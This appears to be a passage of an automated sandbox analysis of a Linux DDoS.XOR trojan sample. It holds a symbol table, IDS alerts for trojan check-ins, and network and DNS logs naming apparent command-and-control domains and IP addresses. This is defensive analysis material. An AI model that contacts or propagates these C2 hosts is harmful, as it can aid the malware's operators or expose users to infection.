                                                                                                                                          __gconv_load_cache.symtab0x8073000479FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_lock.symtab0x80d63144OBJECT<unknown>DEFAULT22
                                                                                                                                          __gconv_lookup_cache.symtab0x80733801216FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_max_path_elem_len.symtab0x80d63204OBJECT<unknown>DEFAULT22
                                                                                                                                          __gconv_modules_db.symtab0x80d63104OBJECT<unknown>DEFAULT22
                                                                                                                                          __gconv_open.symtab0x80a28e01786FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_path_elem.symtab0x80d63244OBJECT<unknown>DEFAULT22
                                                                                                                                          __gconv_path_envvar.symtab0x80d631c4OBJECT<unknown>DEFAULT22
                                                                                                                                          __gconv_read_conf.symtab0x806e2101061FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_release_cache.symtab0x8072ef026FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_release_shlib.symtab0x80738b034FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_release_step.symtab0x806ccc085FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_ascii_internal.symtab0x806fa60891FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_internal_ascii.symtab0x806f4301573FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_internal_ucs2.symtab0x806e8501688FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_internal_ucs2reverse.symtab0x80702401693FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_internal_ucs4.symtab0x80712d0895FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_internal_ucs4le.symtab0x8071650879FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_internal_utf8.symtab0x80726802138FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_ucs2_internal.symtab0x806eef01343FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_ucs2reverse_internal.symtab0x80708e01374FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_ucs4_internal.symtab0x8070e401164FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_ucs4le_internal.symtab0x806fde01111FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transform_utf8_internal.symtab0x80719c03253FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_translit_find.symtab0x8094a20610FUNC<unknown>DEFAULT3
                                                                                                                                          __gconv_transliterate.symtab0x8094cb0873FUNC<unknown>DEFAULT3
                                                                                                                                          __get_avphys_pages.symtab0x806a8a014FUNC<unknown>DEFAULT3
                                                                                                                                          __get_nprocs.symtab0x806aaf0323FUNC<unknown>DEFAULT3
                                                                                                                                          __get_nprocs_conf.symtab0x806aaf0323FUNC<unknown>DEFAULT3
                                                                                                                                          __get_phys_pages.symtab0x806a8b014FUNC<unknown>DEFAULT3
                                                                                                                                          __getclktck.symtab0x806ac4020FUNC<unknown>DEFAULT3
                                                                                                                                          __getcwd.symtab0x808b5f0234FUNC<unknown>DEFAULT3
                                                                                                                                          __getdelim.symtab0x8083eb0624FUNC<unknown>DEFAULT3
                                                                                                                                          __getdents.symtab0x80674a0159FUNC<unknown>DEFAULT3
                                                                                                                                          __getdtablesize.symtab0x806914041FUNC<unknown>DEFAULT3
                                                                                                                                          __getegid.symtab0x808b56012FUNC<unknown>DEFAULT3
                                                                                                                                          __geteuid.symtab0x808b54012FUNC<unknown>DEFAULT3
                                                                                                                                          __getgid.symtab0x808b55012FUNC<unknown>DEFAULT3
                                                                                                                                          __gethostname.symtab0x809fcc0140FUNC<unknown>DEFAULT3
                                                                                                                                          __getpagesize.symtab0x806912023FUNC<unknown>DEFAULT3
                                                                                                                                          __getpid.symtab0x8067ea049FUNC<unknown>DEFAULT3
                                                                                                                                          __getrlimit.symtab0x806903054FUNC<unknown>DEFAULT3
                                                                                                                                          __getsockname.symtab0x806ae0030FUNC<unknown>DEFAULT3
                                                                                                                                          __getsockopt.symtab0x806ae2030FUNC<unknown>DEFAULT3
                                                                                                                                          __gettext_extract_plural.symtab0x8078660266FUNC<unknown>DEFAULT3
                                                                                                                                          __gettext_free_exp.symtab0x8077ad0523FUNC<unknown>DEFAULT3
                                                                                                                                          __gettext_germanic_plural.symtab0x80c224820OBJECT<unknown>DEFAULT7
                                                                                                                                          __gettextparse.symtab0x8077dd02186FUNC<unknown>DEFAULT3
                                                                                                                                          __gettimeofday.symtab0x806719031FUNC<unknown>DEFAULT3
                                                                                                                                          __gettimeofday_internal.symtab0x806719031FUNC<unknown>DEFAULT3
                                                                                                                                          __getuid.symtab0x808b53012FUNC<unknown>DEFAULT3
                                                                                                                                          __gmon_start__.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                                                                                                                                          __guess_grouping.symtab0x807f2a076FUNC<unknown>DEFAULT3
                                                                                                                                          __hash_string.symtab0x807877059FUNC<unknown>DEFAULT3
                                                                                                                                          __i686.get_pc_thunk.bx.symtab0x80af81d0FUNC<unknown>HIDDEN3
                                                                                                                                          __i686.get_pc_thunk.cx.symtab0x80af8190FUNC<unknown>HIDDEN3
                                                                                                                                          __inet_aton.symtab0x806b260343FUNC<unknown>DEFAULT3
                                                                                                                                          __init_array_end.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                          __init_array_start.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                          __init_misc.symtab0x806ac6078FUNC<unknown>DEFAULT3
                                                                                                                                          __init_sched_fifo_prio.symtab0x8053f8042FUNC<unknown>DEFAULT3
                                                                                                                                          __initstate.symtab0x8056370112FUNC<unknown>DEFAULT3
                                                                                                                                          __initstate_r.symtab0x8056780545FUNC<unknown>DEFAULT3
                                                                                                                                          __ioctl.symtab0x80690f033FUNC<unknown>DEFAULT3
                                                                                                                                          __is_smp.symtab0x80d61904OBJECT<unknown>DEFAULT22
                                                                                                                                          __isatty.symtab0x808b6e034FUNC<unknown>DEFAULT3
                                                                                                                                          __isinf.symtab0x80964d064FUNC<unknown>DEFAULT3
                                                                                                                                          __isinfl.symtab0x809654085FUNC<unknown>DEFAULT3
                                                                                                                                          __isnan.symtab0x809651039FUNC<unknown>DEFAULT3
                                                                                                                                          __isnanl.symtab0x80965a069FUNC<unknown>DEFAULT3
                                                                                                                                          __kill.symtab0x805556031FUNC<unknown>DEFAULT3
                                                                                                                                          __lchown.symtab0x8068d8057FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_alloca_cutoff.symtab0x806b01066FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_argc.symtab0x80d63084OBJECT<unknown>DEFAULT22
                                                                                                                                          __libc_argv.symtab0x80d630c4OBJECT<unknown>DEFAULT22
                                                                                                                                          __libc_calloc.symtab0x80639e0842FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_check_standard_fds.symtab0x8054cd0459FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_cleanup_routine.symtab0x806b06027FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_close.symtab0x8053ad080FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_connect.symtab0x8053c3087FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_csu_fini.symtab0x805512057FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_csu_init.symtab0x8055160127FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_disable_asynccancel.symtab0x806b08050FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_dlclose.symtab0x80945c087FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_dlopen_mode.symtab0x8094700226FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_dlsym.symtab0x8094620108FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_dlsym_private.symtab0x8094690108FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_enable_asynccancel.symtab0x806b0c098FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_enable_secure.symtab0x80cf1404OBJECT<unknown>DEFAULT18
                                                                                                                                          __libc_enable_secure_decided.symtab0x80d63044OBJECT<unknown>DEFAULT22
                                                                                                                                          __libc_errno.symtab0x144TLS<unknown>DEFAULT14
                                                                                                                                          __libc_fatal.symtab0x8059d9042FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_fcntl.symtab0x8053b70177FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_fork.symtab0x8067810535FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_free.symtab0x8065320410FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_init_first.symtab0x806cba0133FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_init_secure.symtab0x806cb4066FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_longjmp.symtab0x805535084FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_lseek.symtab0x8053d5033FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_malloc_initialized.symtab0x80cf9f84OBJECT<unknown>DEFAULT21
                                                                                                                                          __libc_mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_message.symtab0x8059ad0691FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_multiple_libcs.symtab0x80cfa4c4OBJECT<unknown>DEFAULT21
                                                                                                                                          __libc_nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_pause.symtab0x8053de064FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_pthread_init.symtab0x806b23045FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_pvalloc.symtab0x80630c0469FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_read.symtab0x8053a7091FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_realloc.symtab0x80654c01085FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_recvfrom.symtab0x8053c9087FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_register_dl_open_hook.symtab0x80947f0125FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_register_dlfcn_hook.symtab0x809e5b037FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_resp.symtab0x04TLS<unknown>DEFAULT13
                                                                                                                                          __libc_select.symtab0x8069170115FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_send.symtab0x806ae4087FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_sendto.symtab0x8053cf087FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_setlocale_lock.symtab0x80d58a032OBJECT<unknown>DEFAULT22
                                                                                                                                          __libc_setup_tls.symtab0x8054f00505FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_sigaction.symtab0x8054730298FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_siglongjmp.symtab0x805535084FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_stack_end.symtab0x80cf13c4OBJECT<unknown>DEFAULT18
                                                                                                                                          __libc_start_main.symtab0x80549b0763FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_system.symtab0x8057a30104FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_thread_freeres.symtab0x80b298033FUNC<unknown>DEFAULT5
                                                                                                                                          __libc_tsd_CTYPE_B.symtab0x184TLS<unknown>DEFAULT14
                                                                                                                                          __libc_tsd_CTYPE_TOLOWER.symtab0x204TLS<unknown>DEFAULT14
                                                                                                                                          __libc_tsd_CTYPE_TOUPPER.symtab0x1c4TLS<unknown>DEFAULT14
                                                                                                                                          __libc_tsd_LOCALE.symtab0x84TLS<unknown>DEFAULT13
                                                                                                                                          __libc_tsd_MALLOC.symtab0x244TLS<unknown>DEFAULT14
                                                                                                                                          __libc_valloc.symtab0x80632a0467FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_waitpid.symtab0x8053e2091FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_write.symtab0x8053a1091FUNC<unknown>DEFAULT3
                                                                                                                                          __libc_writev.symtab0x808b980270FUNC<unknown>DEFAULT3
                                                                                                                                          __libio_codecvt.symtab0x80c2e00120OBJECT<unknown>DEFAULT7
                                                                                                                                          __libio_translit.symtab0x80c2e7820OBJECT<unknown>DEFAULT7
                                                                                                                                          __lll_lock_wait.symtab0x805373048FUNC<unknown>HIDDEN3
                                                                                                                                          __lll_lock_wait_private.symtab0x805370042FUNC<unknown>HIDDEN3
                                                                                                                                          __lll_robust_lock_wait.symtab0x80538e081FUNC<unknown>HIDDEN3
                                                                                                                                          __lll_robust_timedlock_wait.symtab0x8053940201FUNC<unknown>HIDDEN3
                                                                                                                                          __lll_timedlock_wait.symtab0x8053760173FUNC<unknown>HIDDEN3
                                                                                                                                          __lll_timedwait_tid.symtab0x8053870112FUNC<unknown>HIDDEN3
                                                                                                                                          __lll_unlock_wake.symtab0x805384043FUNC<unknown>HIDDEN3
                                                                                                                                          __lll_unlock_wake_private.symtab0x805381037FUNC<unknown>HIDDEN3
                                                                                                                                          __llseek.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                          __localtime_r.symtab0x8086e0034FUNC<unknown>DEFAULT3
                                                                                                                                          __longjmp.symtab0x80553b043FUNC<unknown>DEFAULT3
                                                                                                                                          __lseek.symtab0x8053d5033FUNC<unknown>DEFAULT3
                                                                                                                                          __lseek64.symtab0x806ad50117FUNC<unknown>DEFAULT3
                                                                                                                                          __make_stacks_executable.symtab0x8051210257FUNC<unknown>DEFAULT3
                                                                                                                                          __mallinfo.symtab0x8060a60353FUNC<unknown>DEFAULT3
                                                                                                                                          __malloc.symtab0x8063d30442FUNC<unknown>DEFAULT3
                                                                                                                                          __malloc_check_init.symtab0x8060000121FUNC<unknown>DEFAULT3
                                                                                                                                          __malloc_get_state.symtab0x8064180428FUNC<unknown>DEFAULT3
                                                                                                                                          __malloc_hook.symtab0x80cf9ec4OBJECT<unknown>DEFAULT21
                                                                                                                                          __malloc_initialize_hook.symtab0x80d4b404OBJECT<unknown>DEFAULT22
                                                                                                                                          __malloc_set_state.symtab0x8060dc0905FUNC<unknown>DEFAULT3
                                                                                                                                          __malloc_stats.symtab0x8060840529FUNC<unknown>DEFAULT3
                                                                                                                                          __malloc_trim.symtab0x8060bd0493FUNC<unknown>DEFAULT3
                                                                                                                                          __malloc_usable_size.symtab0x805f01052FUNC<unknown>DEFAULT3
                                                                                                                                          __mallopt.symtab0x8061150356FUNC<unknown>DEFAULT3
                                                                                                                                          __mbrlen.symtab0x808650055FUNC<unknown>DEFAULT3
                                                                                                                                          __mbrtowc.symtab0x8086540407FUNC<unknown>DEFAULT3
                                                                                                                                          __mbsnrtowcs.symtab0x8086ae0594FUNC<unknown>DEFAULT3
                                                                                                                                          __memalign.symtab0x8063ef0467FUNC<unknown>DEFAULT3
                                                                                                                                          __memalign_hook.symtab0x80cf9f44OBJECT<unknown>DEFAULT21
                                                                                                                                          __memchr.symtab0x8066760411FUNC<unknown>DEFAULT3
                                                                                                                                          __mempcpy.symtab0x8066a2068FUNC<unknown>DEFAULT3
                                                                                                                                          __mkdir.symtab0x8068d6031FUNC<unknown>DEFAULT3
                                                                                                                                          __mktime_internal.symtab0x809f3002437FUNC<unknown>DEFAULT3
                                                                                                                                          __mmap.symtab0x8069da067FUNC<unknown>DEFAULT3
                                                                                                                                          __mmap64.symtab0x8069df088FUNC<unknown>DEFAULT3
                                                                                                                                          __mon_yday.symtab0x80c72c052OBJECT<unknown>DEFAULT7
                                                                                                                                          __morecore.symtab0x80cf9e84OBJECT<unknown>DEFAULT21
                                                                                                                                          __mpn_add_n.symtab0x80aa690144FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_addmul_1.symtab0x80aa72060FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_cmp.symtab0x8096b6092FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_construct_double.symtab0x80aa7a086FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_construct_float.symtab0x80aa76049FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_construct_long_double.symtab0x80aa80071FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_divrem.symtab0x8096bc01112FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_extract_double.symtab0x80988b0244FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_extract_long_double.symtab0x80989b0279FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_impn_mul_n.symtab0x80976701989FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_impn_mul_n_basecase.symtab0x8097570247FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_impn_sqr_n.symtab0x8097e401829FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_impn_sqr_n_basecase.symtab0x8097470250FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_lshift.symtab0x809702087FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_mul.symtab0x80970e0843FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_mul_1.symtab0x809743057FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_mul_n.symtab0x8098570620FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_rshift.symtab0x809708087FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_sub_n.symtab0x80987e0144FUNC<unknown>DEFAULT3
                                                                                                                                          __mpn_submul_1.symtab0x809887060FUNC<unknown>DEFAULT3
                                                                                                                                          __mprotect.symtab0x8069e7033FUNC<unknown>DEFAULT3
                                                                                                                                          __mremap.symtab0x806add045FUNC<unknown>DEFAULT3
                                                                                                                                          __munmap.symtab0x8069e5031FUNC<unknown>DEFAULT3
                                                                                                                                          __nanosleep.symtab0x80677b087FUNC<unknown>DEFAULT3
                                                                                                                                          __nanosleep_nocancel.symtab0x80677ba31FUNC<unknown>DEFAULT3
                                                                                                                                          __new_exitfn.symtab0x8056000274FUNC<unknown>DEFAULT3
                                                                                                                                          __new_exitfn_called.symtab0x80d62408OBJECT<unknown>DEFAULT22
                                                                                                                                          __new_fclose.symtab0x8057df0439FUNC<unknown>DEFAULT3
                                                                                                                                          __new_fopen.symtab0x80582a034FUNC<unknown>DEFAULT3
                                                                                                                                          __new_getrlimit.symtab0x806903054FUNC<unknown>DEFAULT3
                                                                                                                                          __new_sem_init.symtab0x805332084FUNC<unknown>DEFAULT3
                                                                                                                                          __new_sem_post.symtab0x805342078FUNC<unknown>DEFAULT3
                                                                                                                                          __new_sem_wait.symtab0x8053380141FUNC<unknown>DEFAULT3
                                                                                                                                          __nptl_create_event.symtab0x80547005FUNC<unknown>DEFAULT3
                                                                                                                                          __nptl_deallocate_tsd.symtab0x8050980278FUNC<unknown>DEFAULT3
                                                                                                                                          __nptl_death_event.symtab0x80547105FUNC<unknown>DEFAULT3
                                                                                                                                          __nptl_initial_report_events.symtab0x80d20cc1OBJECT<unknown>DEFAULT22
                                                                                                                                          __nptl_last_event.symtab0x80d20c04OBJECT<unknown>DEFAULT22
                                                                                                                                          __nptl_nthreads.symtab0x80cf4f04OBJECT<unknown>DEFAULT21
                                                                                                                                          __nptl_setxid.symtab0x8050e60941FUNC<unknown>DEFAULT3
                                                                                                                                          __nptl_threads_events.symtab0x80d20b88OBJECT<unknown>DEFAULT22
                                                                                                                                          __offtime.symtab0x809f010746FUNC<unknown>DEFAULT3
                                                                                                                                          __open.symtab0x8053d8091FUNC<unknown>DEFAULT3
                                                                                                                                          __open_nocancel.symtab0x8053d8a33FUNC<unknown>DEFAULT3
                                                                                                                                          __opendir.symtab0x80672a0220FUNC<unknown>DEFAULT3
                                                                                                                                          __overflow.symtab0x805d81041FUNC<unknown>DEFAULT3
                                                                                                                                          __parse_one_specmb.symtab0x80834801320FUNC<unknown>DEFAULT3
                                                                                                                                          __pause_nocancel.symtab0x8053dea19FUNC<unknown>DEFAULT3
                                                                                                                                          __posix_memalign.symtab0x80640d0111FUNC<unknown>DEFAULT3
                                                                                                                                          __preinit_array_end.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                          __preinit_array_start.symtab0x80cf1200NOTYPE<unknown>HIDDEN14
                                                                                                                                          __printf_arginfo_table.symtab0x80d63e04OBJECT<unknown>DEFAULT23
                                                                                                                                          __printf_fp.symtab0x807f6209363FUNC<unknown>DEFAULT3
                                                                                                                                          __printf_fphex.symtab0x8081b506104FUNC<unknown>DEFAULT3
                                                                                                                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                          192.168.2.2354.36.15.9957652802021336 07/09/22-18:43:50.434118TCP2021336ET TROJAN DDoS.XOR Checkin via HTTP5765280192.168.2.2354.36.15.99
                                                                                                                                          192.168.2.2354.36.15.9645690532020381 07/09/22-18:43:50.618138TCP2020381ET TROJAN DDoS.XOR Checkin4569053192.168.2.2354.36.15.96
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jul 9, 2022 18:43:50.405172110 CEST5765280192.168.2.2354.36.15.99
                                                                                                                                          Jul 9, 2022 18:43:50.414134979 CEST3864853192.168.2.2351.89.52.12
                                                                                                                                          Jul 9, 2022 18:43:50.432872057 CEST805765254.36.15.99192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.432957888 CEST5765280192.168.2.2354.36.15.99
                                                                                                                                          Jul 9, 2022 18:43:50.433012009 CEST533864851.89.52.12192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.434118032 CEST5765280192.168.2.2354.36.15.99
                                                                                                                                          Jul 9, 2022 18:43:50.461807013 CEST805765254.36.15.99192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.463247061 CEST5765280192.168.2.2354.36.15.99
                                                                                                                                          Jul 9, 2022 18:43:50.489211082 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:43:50.490967989 CEST805765254.36.15.99192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.517319918 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.517456055 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:43:50.534085989 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:43:50.617892981 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.618138075 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:43:50.647607088 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.647756100 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:43:51.483376980 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                          Jul 9, 2022 18:43:52.251247883 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                          Jul 9, 2022 18:43:59.747014046 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:59.747279882 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:44:06.842649937 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                          Jul 9, 2022 18:44:09.775974035 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:44:09.776083946 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:44:17.082079887 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                          Jul 9, 2022 18:44:19.808593988 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:44:19.808824062 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:44:23.225656986 CEST4251680192.168.2.23109.202.202.202
                                                                                                                                          Jul 9, 2022 18:44:29.841607094 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:44:29.841763973 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:44:34.780497074 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:44:34.780622959 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:44:44.814677000 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:44:44.814954996 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:44:47.804505110 CEST43928443192.168.2.2391.189.91.42
                                                                                                                                          Jul 9, 2022 18:44:54.844765902 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:44:54.844980001 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:45:04.877028942 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:45:04.877403021 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:45:08.279642105 CEST42836443192.168.2.2391.189.91.43
                                                                                                                                          Jul 9, 2022 18:45:09.831677914 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:45:09.831783056 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:45:19.863102913 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:45:19.863447905 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:45:29.895916939 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:45:29.896001101 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:45:39.928158045 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:45:39.928455114 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          Jul 9, 2022 18:45:44.883074999 CEST534569054.36.15.96192.168.2.23
                                                                                                                                          Jul 9, 2022 18:45:44.883425951 CEST4569053192.168.2.2354.36.15.96
                                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                                          Jul 9, 2022 18:43:50.385700941 CEST5594753192.168.2.238.8.8.8
                                                                                                                                          Jul 9, 2022 18:43:50.393372059 CEST5809853192.168.2.238.8.8.8
                                                                                                                                          Jul 9, 2022 18:43:50.405038118 CEST53559478.8.8.8192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.412745953 CEST53580988.8.8.8192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.433160067 CEST4525853192.168.2.238.8.8.8
                                                                                                                                          Jul 9, 2022 18:43:50.451155901 CEST53452588.8.8.8192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.451282024 CEST4962753192.168.2.238.8.4.4
                                                                                                                                          Jul 9, 2022 18:43:50.470971107 CEST53496278.8.4.4192.168.2.23
                                                                                                                                          Jul 9, 2022 18:43:50.471167088 CEST3474853192.168.2.238.8.8.8
                                                                                                                                          Jul 9, 2022 18:43:50.489026070 CEST53347488.8.8.8192.168.2.23
                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                          Jul 9, 2022 18:43:50.385700941 CEST192.168.2.238.8.8.80xd253Standard query (0)www1.gggatat456.comA (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.393372059 CEST192.168.2.238.8.8.80xf3f7Standard query (0)p5.lpjulidny7.comA (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.433160067 CEST192.168.2.238.8.8.80x8a80Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.451282024 CEST192.168.2.238.8.4.40xe320Standard query (0)p5.dddgata789.comA (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.471167088 CEST192.168.2.238.8.8.80x813bStandard query (0)ppp.xxxatat456.comA (IP address)IN (0x0001)
                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                          Jul 9, 2022 18:43:50.405038118 CEST8.8.8.8192.168.2.230xd253No error (0)www1.gggatat456.com54.36.15.99A (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.451155901 CEST8.8.8.8192.168.2.230x8a80Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.470971107 CEST8.8.4.4192.168.2.230xe320Name error (3)p5.dddgata789.comnonenoneA (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.489026070 CEST8.8.8.8192.168.2.230x813bNo error (0)ppp.xxxatat456.com54.36.15.96A (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.489026070 CEST8.8.8.8192.168.2.230x813bNo error (0)ppp.xxxatat456.com79.137.1.132A (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.489026070 CEST8.8.8.8192.168.2.230x813bNo error (0)ppp.xxxatat456.com46.105.84.190A (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.489026070 CEST8.8.8.8192.168.2.230x813bNo error (0)ppp.xxxatat456.com79.137.1.134A (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.489026070 CEST8.8.8.8192.168.2.230x813bNo error (0)ppp.xxxatat456.com46.105.84.188A (IP address)IN (0x0001)
                                                                                                                                          Jul 9, 2022 18:43:50.489026070 CEST8.8.8.8192.168.2.230x813bNo error (0)ppp.xxxatat456.com54.36.15.98A (IP address)IN (0x0001)
                                                                                                                                          • www1.gggatat456.com
                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
